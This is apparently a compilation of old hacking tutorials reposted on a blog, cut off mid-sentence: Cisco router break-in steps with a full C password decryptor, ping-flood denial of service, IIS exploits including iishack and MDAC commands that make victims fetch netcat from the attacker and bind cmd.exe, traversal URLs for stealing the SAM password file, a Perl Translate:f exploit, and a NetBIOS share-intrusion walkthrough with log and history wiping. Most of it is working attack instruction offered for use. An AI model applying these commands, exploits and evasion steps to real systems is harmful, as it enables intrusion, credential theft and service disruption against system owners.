Winsock", and then put in the computer to communicate with, and the port #. You can tell it to listen for input by
going to Call>Wait for Call. Now the other computer can connect to you on that port, and you can chat and transfer
files.

----------------------------------

How to use Ping:

Ping is easy, just open the MS-DOS prompt, and type "ping ip.address", by default it will ping 3 times, but you can
type

"ping ip.address -t"

Which will make it ping forever. To change the ping size do this:

"ping -l (size) ip.address"

What ping does is send a packet of data to a computer, then sees how long it takes to be returned, which determines
the computer's connection speed, and the time that it takes for a packet to go back and forth (this is called the
"trip time"). Ping can also be used to slow down or even crash a system if the system is overloaded by ping floods.
Windows 98 crashes after one minute of pingflooding (it's connections buffer is overflown - too many connections are
registered, and so Windows decides to take a little vacation).
A ping flood attack takes a lot of bandwidth from you, and you must have more bandwidth than your target (unless
the target is a Windows 98 box and you have an average modem, that way you'll knock it down after approximately a
single minute of ping flooding). Ping flooding isn't effective against stronger targets, unless you have quite a few
evil lines to yourself, and you have control over a few bandwidth-saavy hosts that can ping flood your target as
well.
Note: DOS's -t option doesn't do a ping flood, it just pings the target continously, with intervals from one ping to
another. In every Unix or Linux distribution, you can use ping -f to do a real pingflood. Actually ping -f is
required if you want your distribution to be POSIX-compliant (POSIX - Portable Operating System Interface based on
uniX), otherwise it's not a real Unix/Linux distribution, so if you have an OS that calls itself either Unix or
Linux, it has the -f switch.

----------------------------------

How to use TraceRoute:

To trace your connection (and see all the computer's between you and a target), just open the MS-DOS prompt, and
type "tracert ip.address" and you will see a list of computers, which are between you and the target computer.

You can use this to determine if there are firewalls blocking anything. And will also allow you to determine
someone's ISP (internet service provider).

To determine the ISP, simple look at the IP address before the last one, this should be one of the ISP's routers.

Basically, this is how traceroute works - a TCP/IP packet has a value in it's header (it's in the IP header. If you
don't know what this means, then ignore it and continue reading, it's not that crucial) called TTL, which stands
for Time To Live. Whenever a packet hops (travels through a router) it's TTL value is decreased by one. This is just
a countermeasure against the possibility that something would go wrong and a packet would ricochet all around the
net, thus wasting bandwidth.
So when a packet's TTL reaches zero, it dies and an ICMP error is sent back to the sender.
Now, traceroute first sends a packet with a TTL value of 1. The packet quickly returns, and by looking at the
sender's address in the ICMP error's header, the traceroute knows where the packet has been in it's first hop. Then
it sends a packet with a TTL value of 2, and it returns after the second hop, revealing it's identity. This goes on
until the packet reaches it's destination.

Now isn't that fun? :-)

----------------------------------

How to use a proxy server:

Do a search on the web for a proxy server which runs on the port of your choice. Once you find one, connect to it
with either telnet or hyperterminal and then connect to another computer through the proxy server. This way the
computer at the other end will not know your IP address.

----------------------------------

Section 1: why hack a cisco router?

You probably are wondering.. why hack into a cisco router?

The reason being is that they are useful when it comes to breaking into other systems...

Cisco routers are very fast, some with 18 T1 connections on one system, and they are very flexible and can be used
in DoS attacks or to hack other systems since most of them run telnet.

They also have thousands of packets going through them at any one time, which can be captured and decoded... A lot
of cisco routers are also trusted systems, and will let you have a certain amount of access to other computers on
it's network.

----------------------------------

Section 2: finding a cisco router

Finding a cisco router is a fairly easy task, almost every ISP will route through at least one cisco router. The
easiest way to find a cisco router is to run a traceroute from dos (type "tracert" and then the IP address of
anyone's computer), you can trace pretty much anyone because the trace will show all of the computer systems between
your computer and their computer. One of these systems will probably have the name "cisco" in it's name. If you find
one like this, copy down it's IP address.

Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's
being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another
way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a
connection to the router on port 23.. If it asks for a password, but no username, you are at the router, but if it
wants a username aswell, you are probably at a firewall.

Try to find a router without a firewall, since this tutorial is on the routers and not how to get past the
firewalls. Once you're sure you have found a good system, you should find a proxy server which will allow you to use
port 23, this way your IP will not be logged by the router.

---------------------------------

Section 3: how to break into a cisco router

Cisco routers running v4.1 software (which currently is most of them) will be easily disabled. You simply connect to
the router on port 23 through your proxy server, and enter a HUGE password string, something like;

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

Now wait, the cisco system might reboot, in which case you can't hack it because it is offline.. But it will
probably freeze up for a period of 2-10 minutes, which you must use to get in.

If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks,
like a huge ping. Go to dos and type "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.

While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the
reason for this is because by default, this is the router's password, and while it is temporarily disabled, it will
revert to it's default state.

Now that you have logged in, you must acquire the password file! The systems run different software, but most will
have a prompt like "htl-textil" or something, now type "?" for a list of commands, you will see a huge list of
commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is
the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to
wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept
the file that this machine is sending you, say yes and save it to disk. Logout.

You are now past the hardest part, give yourself a pat on the back and get ready to break that password!

------------------------------

Section 4: breaking the password

Now that you have acquired the password file, you have to break it so you can access the router again. To do this,
you can run a program like John the Ripper or something on the password file, and you may break it.

This is the easiest way, and the way i would recommend. Another way would be to try and decrypt it. For this you
will need some decryption software, a lot a patience, and some of the decryption sequences.

Here is a sequence for decrypting a cisco password, you have to compile this in linux:

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] - '0';
continue;
}

if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
val += enc_pw[i] - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p \n", pname);
fprintf(stdout, " %s \n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
fprintf(stdout, "password: %s\n", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == '\r')
i--;

if(line[i] == '\n')
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%s\n", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.\n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);
}
}
}

If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on
the file with John the Ripper or another password-cracker.

-------------------------------

Section 5: using the router

To use this wonderful piece of technology, you will have to be able to connect to it, use a proxy if you do not want
your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you were
doing, type in "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the router's
commands, and you will be able to use most of them.

These routers usually have telnet, so you can use telnet to connect to other systems, (like unix boxes) and hack
into them. It also is equipped with ping and traceroute, which you can use to trace systems or do DoS attacks. You
may also be able to use it to intercept packets, but i do not recommend this, as it will not always work, and may
get you noticed....

---------------------------------

If you don't hack a cisco your first time, don't worry... you probably won't do it the first time, or even the
second. It takes practice and patience. This is just to show you how... And make sure you are going after something
that is LEGAL.

Hacking iis tutorial

2007-12-02T01:16:00.000-08:00

Forewords:
This text goes out to all those NT hackers out there. It is based on the info I have from eEye Digital Security Team, which found the exploit, and my own experience.
Note: All the files used in this paper can be found at the main page.

According to eEye Digital Security Team the systems affected include:

Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4

I performed the attack from a Windows NT 4.0 machine with the required programs:

iishack.exe
ncx.exe or ncx99.exe or BertzSvc.exe

Ncx.exe is a hacked up version of the program netcat.exe. Ncx.exe always passes -l -p 80 -t -e cmd.exe as its argument, which means that it binds cmd.exe to port 80. The eEye people has received some reports from people not being able use the ncx.exe, so they have made another hacked up version of netcat.exe, ncx99.exe. Ncx99.exe binds cmd.exe to port 99 instead of port 80, which should solve the problem. The reason of why ncx.exe doesn't work sometimes is that inetinfo.exe has to be exited, before it can work. Ncx.exe fits under the description Trojan horse! To kick inetinfo.exe use avoid.exe (which also soon will be available at the web site). BertzSvc.exe binds cmd.exe to port 123 instead.
How to do it:
First of all you'll need a server running IIS4, NT4 and/or SP3/4/5 + OP4. To find such, go to www.netcraft.com or you favorite “what's-this-site-running-search-engine” and find a victim running the affected system.Second, you need to craft a buffer overrun about 3 k on the target machine!
Then launch iishack.exe via the command prompt in WinNT.

Output:

--------(IIS 4.0 remote buffer overflow exploit)----------
(c) dark spyrit -- barns@eeye.com. http://www.eEye.com

[usage: iishack ]
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
do not include 'http://' before hosts!
----------------------------------------------------------

Then issue the command as you can see beneath ex.

C:\>iishack www.victim.com 80 YourOwnIpAddress/ncx.exe

Output (if successful):

Data sent!

note: Give it (the IIS) enough time to download ncx.exe. Hint: Use Rasmon.exe to monitor your outgoing bytes.

After that type telnet www.victim.com 80 in cmd.exe or in the start/run menu.

Output:

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\>

Voila! Access granted!
Do you whatever you wanna do, but remember to:

- add a scheduled task to restart inetinfo.exe in X minutes. (AT command will do it)
- add a scheduled task to delete ncx.exe X-1 minutes.
- clean the log files (if there are any).

Corrections, suggestions or comments are accepted here

---------------------------------------------------------------
Hi Folks,
i have just compiled the well-known IIS tricks. I hope it
will be helpful for securing your server.
any comment,suggestion or insult...? wellcome
MAB-

SECURING IIS by BREAKING
=====================================================
by Mount Ararat Blossom

9/15/2000

mount_ararat_blossom@hotmail.com
=====================================================
01- Abstract
I am not sure what you want to get out of this but basically this paper
is intended on breaking merely IIS web servers especially versions 4.0 and
5.0 via TCP/IP over the port 80. This techniques works against even
so-called secure networks just because every network even those secured ones
lets HTTP connections in.

=====================================================

02- Intro
Alright so you all wanna know how to break into IIS web servers? First off,
you should find a cgi-scanner so that things will get easier. My personnel
preferences are
"whisker" by "rain forest puppy" (www.wiretrip.net/rfp).
"cis" by "mnemonix" (www.cerberus-infosec.co.uk)

To understand which server is running on the victim site
telnet 80
GET HEAD / HTTP/1.0
and there you go with the name and the version of the web server. However
some sites might run their web servers over 8080, 81, 8000, 8001, and so on.
To understand SSL web servers, which provides encryption between the web
server and the browser we use the tool "ssleay"
s_client -connect :443
HEAD / HTTP /1.0
and here we go again.

As i am writing this i am hoping that you will be able to use this to
secure your web servers instead of using this to break into others.
=====================================================

03- Game Starts

========IIS HACK=====
The folks at www.eeye.com, have found a vulnerability on IIS 4.0 which
allows us to upload a crafted version of netcat (hacker's swiss army knife)
onto victim server and binds a cmd.exe on port 80.
The vulnerabliy was a bufferoverflow in .htr .idc and .stm files. The
problem is with insufficient bounds checking of the names in the URL for
.htr .stm and .idc files, allowing hackers to insert some backdoors to
download and execute arbitrary commands on the local system as the
administrator user.
To hack the victim site we need
iishack.exe
ncx.exe (you can find these two at
www.technotronic.com)
plus we need a web server running at our attacking box.

First off, run the web server on your attacking box and place
the ncx.exe on your root directory.
then run iishack.exe against the victim site
c:\>iishack.exe 80 /ncx.exe
Then here we go, go and get your swiss army knife, namely netcat,
c:\>nc 80 ==============>>>BOOM!
the command promt from the victim site suddenly appears on your box !!!
D:\> or whatever it is , C;E;...

do you want me to xplain what to do next, hey common you must be kidding
...hehe....

=========MDAC- Local Command Execution===========
You might think that it is a years-old vulnerability, however what i see on
pen-tests is that almost 40% of IIS web servers are still vulnerable to
this.
IIS' MDAC component has a vulnerability where an attacker can submit
commands for local execution.
The core problem is with the RDS Datafactory. By default, it allows remote
commands to be sent to the IIS server. The commands will be run as the
effective user of the service, which is typically the SYSTEM user.
I wont get into details, if you want go and check RFP's web
site. However, you can find a vulnerable site by checking
c:\>nc -nw -w 2 80
GET /msadc/msadcs.dll HTTP
and if you get the following
application/x_varg
it is most probably vulnerable if not patched.
You can find the exploit, mdac.pl and msadc2.pl from rain forest puppy's
web site at www.wiretrip.net/rfp It checks for the vulnerability and if it
is vulnerable then it asks for the command you wanna execute:
c:\> mdac.pl -h
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
if you wanna change the web site which is located at
d:\inetpub\wwwroot\victimweb\index.htm
then you can type:
cmd/c echo hacked by me > d:\inetpub\wwwroot\victimweb\index.htm
or what ever you want but my personnal preference is uploading our swiss
army knife, netcat, and binding it to the cmd.exe to the port 80. To do that
i set up my TFTP server and put nc.exe in it. Then when i am asked to type
the command i want to execute, i type the following:
cmd/c cd %systemroot%&&tftp -i GET nc.exe&&del ftptmp
&& attrib -r nc.exe&&nc.exe -l -p 80 -t -e cmd.exe
there you go, go on fire your netcat against the victim over port 80, you
get the eggshell, cmd.exe.....

=========Codebrws.asp & Showcode.asp ==================

Codebrws.asp and Showcode.asp is a viewer file that ships with Microsoft
IIS, but is
not installed by default. The viewer is intended to be installed by the
administrator to allow for the viewing of sample files as a learning
exercise; however, the viewer does not restrict what files can be accessed.
A remote attacker can exploit this vulnerability to
view the contents of any file on the victim's server. However, there are
several issues to be aware of:

1. Codebrws.asp and showcode.asp are not installed by default.
2. The vulnerability only allows for viewing of files.
3. The vulnerability does not bypass WindowsNT Access Control Lists
(ACLs).
4. Only files in the same disk partition can be viewed.
5. Attackers must know the location of the requested file.

Lets say you wanna see the code of codebrws.asp request the following from
the from your favorite web browser,
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/
iisamples/exair/howitworks/codebrws.asp
then you will see the source code of codebrws.asp
For using showcode.asp, do the following again from your infamous browser
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/repair/sam._
There you go, you get the infamous sam._ file, copy it, expand it and crack
it using Lophtcrack, my personal choise, and you will get all user passwords
even the administrator one.

=========Null.htw===============

Microsoft IIS running with Index Server contains a vulnerability
through Null.htw even if no .htw files exist on the server. Thevulnerability
displays the source code of an ASP page or otherrequested file. The ability
to view ASP pages could provide sensitive information such as usernames and
passwords. An attacker providing IIS with a malformed URL request could
escape the virtual directory, providing access to the logical drive and root
directory. The "hit-highlighting" function in the Index Server does not
adequately restrain what types of files may be requested, allowing an
attacker to
request any file on the server. Microsoft has released a patch for Windows
2000 addressing this vulnerability.

Null.htw function has 3 variables which gets their inputs from the user.
These variables are as follows
CiWebhitsfile
CiRestriction
CiHiliteType
Respectively.
Say that, we wanna see the source code of default.asp, the type the
following from your favorite browser
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full
and you will get the source of default.asp file.

========webhits.dll & .htw================
The hit-highligting functionality provided by Index Server allows a web
user to have a document with their original search terms highlighted on the
page. The name of the document is passed to .htw file with the CiWebhitsfile
argument. Webhits.dll, the ISAPI Application that deals with the request,
opens the file highlights accordingly and returns the resulting page. As the
user has control of the CiWebhitsfile argument passed to the .htw file they
can request anything they want. And the real problem is that, they can view
the source of ASP and other scripted pages.
To unserstand you are vulnerable, request the following from the site
http://www.victim.com/nosuchfile.htw
if you get the following from the server
format of the QUERY_STRING is invalid
it means that you are vulnerable.
The problem is because of webhits.dll (an ISAPI Application) associated to
.htw files. You can find the .htw files in the following locations of
infamous IIS web server,
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/isssamples/exair/search/qfullhit.htw
/isssamples/exair/search/qsumrhit.htw
/isshelp/iss/misc/iirturnh.htw (this is normally for loopback)
An attacker, for instance view the contents of sam._ file as follows
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._&cirestriction=none&cihilitetype=full
will reveal the contents of sam._ file, which is binary, you should copy
it, expand it and crack it as i explained several times before.

===ASP Alternate Data Streams(::$DATA)==================

The $DATA vulnerability, published in mid-1998, results from an error
in the way the Internet Information Server parses file names. $DATA is an
attribute of the main data stream (which holds the "primary content") stored
within a file on NT File System (NTFS). By creating a specially constructed
URL, it is possible to use IIS to access this data stream from a browser.
Doing so will display the code of the file
containing that data stream and any data that file holds. This method can be
used to display a script-mapped file that can normally be acted upon only by
a particular Application Mapping. The contents of these files are not
ordinarily available to users. However, in order to display the file, the
file must reside on the NTFS partition and must
have ACLs set to allow at least read access; the unauthorized user must also
know the file name. Microsoft Windows NT Server's IIS versions 1.0, 2.0, 3.0
and 4.0 are affected by this vulnerability.
Microsoft has produced a hotfix for IIS versions 3.0 and 4.0. The fix
involves IIS "supporting NTFS alternate data streams by asking Windows
NT to make the file name canonical" according the Microsoft.
To view or get the source of an .asp code, type the following from your
browser
http://www.victim.com/default.asp::$DATA
and you will get the source code.

=========ASP Dot Bug====================
The famous Lopht group has discovered the ASP dot bug in 1997. The
vulnerability involved being able to reveal ASP source code to attackers. By
appending one or more dots to the end of an ASP URL under IIS 3.0, it was
possible to view the ASP source code.
The exploit worked by appending a dot the end of an ASP as follows
http://www.victim.com/sample.asp.

======ISM.DLL Buffer Truncation===============

This bug was found by Cerberus Information Security team. It runs on IIS
4.0 and 5.0. that allows attackers to view the content of files and source
code of scripts.
By making a specially formed request to IIS, with the name of the file and
then appending around 230 + “ %20 “ (these represents spaces) and then
appending “ .htr ” this tricks IIS into thinking that the client is
requesting a “ .htr “ file . The .htr file extension is mapped to the
ISM.DLL ISAPI Application and IIS redirects all requests for .htr rsources
to this DLL.
ISM.DLL is then passed the name of the file to open and execute but before
doing this ISM.DLL truncates the buffer sent to it chopping off the .htr and
a few spaces and ends up opening the file we want to get source of. The
contents are then returned.
This attack can only be launched once though., unless the web service
started and stopped. It will only work when ISM.DLL first loaded into
memory.
An attacker can view the source of global.asa, for instance, as follows
http://www.victim.com/global.asa%20%20(...<=230)global.asa.htr
will reveal the source of global.asa

==========.idc & .ida Bugs=======================
This exploit, actually, similar to ASP dot bug, however this time we get
the path of web directory on IIS 4.0. I have even seen this bug working on
IIS 5.0 on my pen-tests. By adding an “.idc” or “.ida” extension to the end
of URL will cause IIS installations to try to run the so-called .IDC through
the database connector .DLL. If the .idc doesnt exists, than it will return
rather informative about the server.
http://www.victim.com/anything.idc or anything.idq
you will get the path.

============+.htr Bug===========================
This exploit is also ever so similar to dot asp bug and you can get the
source code of ASA and ASP files by appending a +.htr to the URL of asp and
asa files.
http://www.victim.com/global.asa+.htr
you may get the source code to browse

===========NT Site Server Adsamples Vulnerability ======
By requesting site.csc, which is normally located in
/adsamples/config/site.csc,
The attacker may be able to retrieve the DSN, UID and PASS of the database
as this file may contain them.
By typing the following
http://www.victim.com/adsamples/config/site.csc
the attacker will download the file site.csc and (s)he can get some
important data.

==========Password Attack to User Accounts===========
IIS 4.0 has an interesting feature that can allow a remote attacker to
attack user accoounts local to the web server as well as other machines
across to the internet. Added to this if your Web server is behind a
firewall performing NAT (network address translation), machines on inside
could be attacked as well.
By default every install of IIS 4.0 creates a virtual directory “
/iisadmpwd “. This directory contains a number of .htr files. Anonymous
users are allowed to access this files, they are not restricted to loopback
address(127.0.0.1). The following is a list of files found in the .iisadmpwd
directory, which physically maps to c:\winnt\system32\inetsrv\iisadmpwd
Achg.htr
Aexp.htr
Aexp2.htr
Aexp2b.htr
Aexp3.htr
Aexp4.htr
Aexp4b.htr
Anot.htr
Anot3.htr
This files are pretty much of the same variants of the same file and allow
a user to change their password via web. It can also be used to enumerate
valid accounts through guess work.
If the user account does not exist, a message will be returned saying
“invalid domain”.
If the account exists, but the password is wrong then the message will say
so.
If an IP address followed by a backslash precedes the account name then the
IIS server will contact the remote machine, over the NetBIOS session port
139, and attempt to change to user’s password. (x.x.x.x\ACCOUNTNAME)
Therefore, if you do not need this service, remove the /iisadmpwd
directory. This will prevent attackers.

=============Translate:f Bug ====================
Daniel Docekal brought this issue in BugTraq this summer, August 15, 2000.
(www.securityfocus.com/bid/1578) The actual problem is with the WebDAV
implementation in office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for ASP/ASA or anyother scriptable page and
adds “translate:f “ into headers of HTTP GET (headers are not part of URL,
part of HTTP request), then they are come up with complete ASP/ASA source
code on Win2K SP1 not installed.
Translate:F is a legitimate header for WebDAV and is used in WebDAV
compatible client and in FP2000 to get the file for editing.
Simple adding of “translate:f” and placing “/” at the end of request to HTTP
GET will lead in security bug.
It is a Win2K bug, but due to FP2000 installed IIS4.00, it is also a IIS4.0
bug.
You can use the following perl script to use this exploit.
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV < 1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, ">$server.txt");
print "Dumping $cm to $server.txt \n";
while() {
print OUT ;
}
sub howto {
print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}
If we call the script as translate.pl then we can get a ASA/ASP source code
as follows
Trasn.pl www.victim.com codetoview.asp

And there you go, you get the source code of codeview.asp.

04- Conclusion

All the information i have given you has been widely used in wild. However
what i tried to do was just to collect all these information together as to
check the security of our famous IIS 4.0 and 5.0. Wheneveri encounter a IIS
web server during my pen-tests, i do check for these vulnerabilities and
most of the time one of these works.
I hope that, what i written was helped you in some way. Thanks for reading
it, please continue to support me as i continue to release this sortta
papers. If you wanna learn more, please check the mentioned people’s web
sites for more details and you can even write to me.
Peace in mind
Watch your servers in wild

Net bios hacking

2007-12-02T01:15:00.001-08:00

Decided to put this here instead of windows because it really is for beginners.

NETBIOS BASED HACKING TUTORIAL BY GAURAV KUMAR

gkverma@msn.com

Preface

Dear reader I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS. Using NetBIOS for hacking is the probably the easiest way to hack remotely. I strongly oppose hacking but not ethical hacking. An ethical hacker is one that hacks computer networks not for anti social reasons but to let the network administrators know about the security holes so that they can prevent their computers from hacking. If you want to contact me please send me a mail to gaurav@sec33.com

Contents-

A brief lesson on NetBIOS

The NBTSTAT command

What you need to hack ?

Types of attacks

Searching for a victim

Lets Hack - Part 1 Remotely reading/writing to a victim's computer

Cracking "Share "passwords

Using IPC$ to hack Windows NT

Penetrating in to the victim's computer

Lets Hack - Part 2 Denial of service attack

How to protect yourself

_______________________________________________________________________________
______________________________

A BRIEF LESSON ON NETBIOS

NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.

________________________________________________________________________________
______________________________

THE NBTSTAT COMMAND

You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service

MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156

If you want to get to know more about the ip address and ports click here

________________________________________________________________________________
____

WHAT YOU NEED TO HACK

All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.

________________________________________________________________________________
____________________________

TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service

________________________________________________________________________________
_____________________________

Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.

________________________________________________________________________________
____________________________

Lets Hack -Part 1 Remotely reading/writing to a victim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .

If you would like to know more about ip address click here . If you don't the ip address where File and Printer Sharing is enabled read "Searching for a victim"

The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk

The command completed successfully.

"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like

Shared resources at \\203.195.136.156

ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
HP-6L Print

"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

